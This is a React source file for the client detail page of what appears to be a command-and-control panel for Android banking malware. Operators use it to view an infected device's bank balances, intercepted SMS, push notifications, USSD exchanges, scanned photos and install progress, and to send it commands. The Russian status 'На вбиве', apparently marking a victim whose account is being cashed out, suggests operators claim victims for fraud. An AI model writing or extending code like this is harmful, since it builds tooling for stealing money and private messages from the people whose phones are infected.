import { socket } from '@/api/socket';
import { SOCKET_EVENTS } from '@/api/socket-events';
import ClientBalancesList from '@/components/client/client-balances-list';
import ClientCommandsList from '@/components/client/client-commands-list';
import ClientFeedTabs from '@/components/client/client-feed-tabs';
import { type ClientFeedTab } from '@/entities/client-feed-categories';
import ClientMeta from '@/components/client/client-meta';
import ClientPushList from '@/components/client/client-push-list';
import ClientDeviceLogList from '@/components/client/client-device-log-list';
import ClientInstallFunnelList from '@/components/client/client-install-funnel-list';
import ClientDeviceLogTypeFilter from '@/components/client/client-device-log-type-filter';
import ClientSmsList from '@/components/client/client-sms-list';
import ClientUssdList from '@/components/client/client-ussd-list';
import ClientPhotoGrid from '@/components/client/client-photo-grid';
import ClientPhotoScanBanner from '@/components/client/client-photo-scan-banner';
import EntityHeroCard, { OnlineStatusBadge } from '@/components/navigation/entity-hero-card';
import { LogoLoader } from '@/components/logo-loader';
import {
	$clientFeedCounts,
	EMPTY_CLIENT_FEED_COUNTS,
	$clients,
	$selectedClient,
	$setClientDetailActions,
	$setClientDetailApps,
	$setClientDetailBalances,
	$setClientDetailCodes,
	$setClientDetailDeviceLogTypes,
	$setClientDetailDeviceLogs,
	$setClientDetailMessages,
	$setClientDetailPushes,
	$setClientDetailPhotos,
	$setClientDetailSearchText,
	$setClientDetailUssds,
	$setClientFeedCounts,
	$setSelectedClient,
	$clientDetailDeviceLogTypes,
} from '@/entities/client.entity';
import { $setClientDetailEvents } from '@/entities/client-event.entity';
import { PageScroll } from '@/layouts/page-layout';
import { isDevMode } from '@/lib/is-dev-mode';
import {
	getMockActionsForClient,
	getMockBalancesForClient,
	getMockCodesForClient,
	getMockDeviceLogsForClient,
	getMockMessagesForClient,
	getMockPushesForClient,
	getMockUssdsForClient,
} from '@/mocks/fixtures';
import { useUnit } from 'effector-react';
import { useEffect, useState } from 'react';
import { useParams } from 'react-router';
import { toast } from 'sonner';

export default function ClientPage() {
	const params = useParams();
	const [
		client,
		setSelectedClient,
		clients,
		feedCountsState,
		setClientFeedCounts,
		setClientDetailCodes,
		setClientDetailApps,
		setClientDetailDeviceLogTypes,
		clientDetailDeviceLogTypes,
		setClientDetailSearchText,
		setClientDetailBalances,
		setClientDetailMessages,
		setClientDetailPushes,
		setClientDetailDeviceLogs,
		setClientDetailUssds,
		setClientDetailActions,
		setClientDetailPhotos,
		setClientDetailEvents,
	] = useUnit([
		$selectedClient,
		$setSelectedClient,
		$clients,
		$clientFeedCounts,
		$setClientFeedCounts,
		$setClientDetailCodes,
		$setClientDetailApps,
		$setClientDetailDeviceLogTypes,
		$clientDetailDeviceLogTypes,
		$setClientDetailSearchText,
		$setClientDetailBalances,
		$setClientDetailMessages,
		$setClientDetailPushes,
		$setClientDetailDeviceLogs,
		$setClientDetailUssds,
		$setClientDetailActions,
		$setClientDetailPhotos,
		$setClientDetailEvents,
	]);
	const [listType, setListType] = useState<ClientFeedTab>('balances');
	const [searchTexts, setSearchTexts] = useState<Record<string, string>>({});
	const clientId = params.id ?? '';
	const searchText = searchTexts[clientId] ?? '';
	const setSearchText = (value: string) => {
		if (!clientId) return;
		setSearchTexts(prev => ({ ...prev, [clientId]: value }));
	};

	useEffect(() => {
		return () => {
			setSelectedClient(null);
			setClientDetailApps([]);
			setClientDetailBalances([]);
			setClientDetailMessages([]);
			setClientDetailPushes([]);
			setClientDetailDeviceLogs([]);
			setClientDetailUssds([]);
			setClientDetailActions([]);
			setClientDetailPhotos([]);
			setClientDetailEvents([]);
		};
	}, [
		setSelectedClient,
		setClientDetailApps,
		setClientDetailBalances,
		setClientDetailMessages,
		setClientDetailPushes,
		setClientDetailDeviceLogs,
		setClientDetailUssds,
		setClientDetailActions,
		setClientDetailPhotos,
		setClientDetailEvents,
	]);

	useEffect(() => {
		setClientDetailSearchText(searchText);
	}, [searchText, setClientDetailSearchText]);

	useEffect(() => {
		setClientDetailDeviceLogTypes([]);
	}, [params.id, setClientDetailDeviceLogTypes]);

	useEffect(() => {
		if (!params.id) return;
		setClientFeedCounts({
			clientId: params.id,
			counts: EMPTY_CLIENT_FEED_COUNTS,
		});
	}, [params.id, setClientFeedCounts]);

	useEffect(() => {
		if (!params.id) return;

		if (isDevMode) {
			const found = clients.find(c => c.id === params.id);
			if (found) {
				setSelectedClient(found);
				setClientDetailCodes(getMockCodesForClient(found.id));
				setClientFeedCounts({
					clientId: found.id,
					counts: {
						balances: getMockBalancesForClient(found.id).length,
						sms: getMockMessagesForClient(found.id).length,
						push: getMockPushesForClient(found.id).length,
						ussd: getMockUssdsForClient(found.id).length,
						errors: getMockDeviceLogsForClient(found.id).length,
						commands: getMockActionsForClient(found.id).length,
						photos: 0,
						install: 0,
					},
				});
			}
			return;
		}

		if (!socket) return;
		socket.emit(SOCKET_EVENTS.getClient, { clientId: params.id });
	}, [params.id, clients, setSelectedClient, setClientDetailCodes, setClientFeedCounts]);

	function handleCopy(text: string) {
		navigator.clipboard
			.writeText(text)
			.then(() => toast.success('Скопировано'))
			.catch(() => toast.error('Ошибка копирования'));
	}

	if (!client) {
		return (
			<div className='absolute inset-0 flex items-center justify-center'>
				<LogoLoader />
			</div>
		);
	}

	const heroAccent = client.takeStatus === 1 ? 'take' : client.isOnline ? 'online' : 'offline';
	const feedCounts =
		feedCountsState.clientId === clientId ? feedCountsState.counts : EMPTY_CLIENT_FEED_COUNTS;

	return (
		<PageScroll contentClassName='p-2 flex flex-col gap-2'>
			<EntityHeroCard
				accent={heroAccent}
				title={`#${client.id}`}
				subtitle={
					client.takeStatus === 1
						? `На вбиве — ${client.takenFrom}`
						: client.pendingLaunch
							? 'Ожидает launch'
							: undefined
				}
				trailing={<OnlineStatusBadge isOnline={client.isOnline} />}
			/>
			<ClientMeta client={client} onCopy={handleCopy} />
			<ClientPhotoScanBanner client={client} />
			<div className='sticky top-0 z-10 -mx-2 px-2 py-2 bg-background/95 backdrop-blur-sm'>
				<ClientFeedTabs
					listType={listType}
					onListTypeChange={setListType}
					searchText={searchText}
					onSearchChange={setSearchText}
					counts={feedCounts}
				/>
			</div>
			<div className='h-[55dvh] min-h-[280px] shrink-0'>
				{listType === 'balances' && (
					<ClientBalancesList clientId={client.id} searchText={searchText} enabled onCopy={handleCopy} />
				)}
				{listType === 'sms' && (
					<ClientSmsList clientId={client.id} searchText={searchText} enabled onCopy={handleCopy} />
				)}
				{listType === 'push' && (
					<ClientPushList clientId={client.id} searchText={searchText} enabled onCopy={handleCopy} />
				)}
				{listType === 'photos' && (
					<ClientPhotoGrid clientId={client.id} searchText={searchText} enabled />
				)}
				{listType === 'ussd' && (
					<ClientUssdList
						clientId={client.id}
						searchText={searchText}
						enabled
						phones={client.phones}
						onCopy={handleCopy}
					/>
				)}
				{listType === 'install' && (
					<ClientInstallFunnelList clientId={client.id} enabled />
				)}
				{listType === 'errors' && (
					<div className='h-full min-h-0 flex flex-col gap-2'>
						<ClientDeviceLogTypeFilter selected={clientDetailDeviceLogTypes} onChange={setClientDetailDeviceLogTypes} />
						<div className='flex-1 basis-0 min-h-0'>
							<ClientDeviceLogList clientId={client.id} searchText={searchText} enabled sdkVersion={client.sdkVersion} />
						</div>
					</div>
				)}
				{listType === 'commands' && (
					<ClientCommandsList clientId={client.id} searchText={searchText} enabled onCopy={handleCopy} />
				)}
			</div>
		</PageScroll>
	);
}
